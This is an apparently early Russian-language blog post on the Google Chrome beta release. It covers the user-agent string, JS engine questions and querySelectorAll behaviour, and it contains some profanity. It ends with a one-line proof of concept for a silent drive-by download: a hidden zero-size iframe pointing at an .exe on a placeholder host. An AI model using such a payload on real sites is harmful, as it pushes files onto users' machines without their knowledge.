Google Chome

Вчера вечером вышел релиз браузера Google Chrome, все предвещают ему долгую жизнь и процветание, а так же прогнозируют что он будет конкурентом уже имеющимся браузерам. Я смотрю на это с точки зрения работы. Меня очень интересовало станет ли ее больше. Честно говоря пока еще точно сказать не могу, но все продвинутые JS библиотеки, такие как jQuery, PrototypeJS, mooTools и т.д. работаю как часы.

Google Chrome

Google не скрывает что не писал с нуля браузер а лишь взял все лучшее из WebKit и Gecko, о чем радостно заявляет UserAgent


Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

Я только не понял пока какой у них JS движок JavaScriptCore (Safari 3.1) или его приемник SquirrelFish (Safari 4.0), а может быть SpiderMonkey (FireFox 3.0) или его потомок TraceMonkey (FireFox 3.1), но я это скоро выясню.

Еще меня интересовало поддерживает ли Chrome метод document.querySelectorAll, и как оказалось поддерживает только какого-то хуя возвращает вместо массива нечто под названием StaticNodeList.

Но самой большой неожиданностью стало то, что при всей хвалености гугловкого кода, в первый же день, была найдена огромная дыра в безопасности. Можно загрузить любой файл. даже *.exe без ведома пользователя на его машину, примерно вот таким образом.


document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');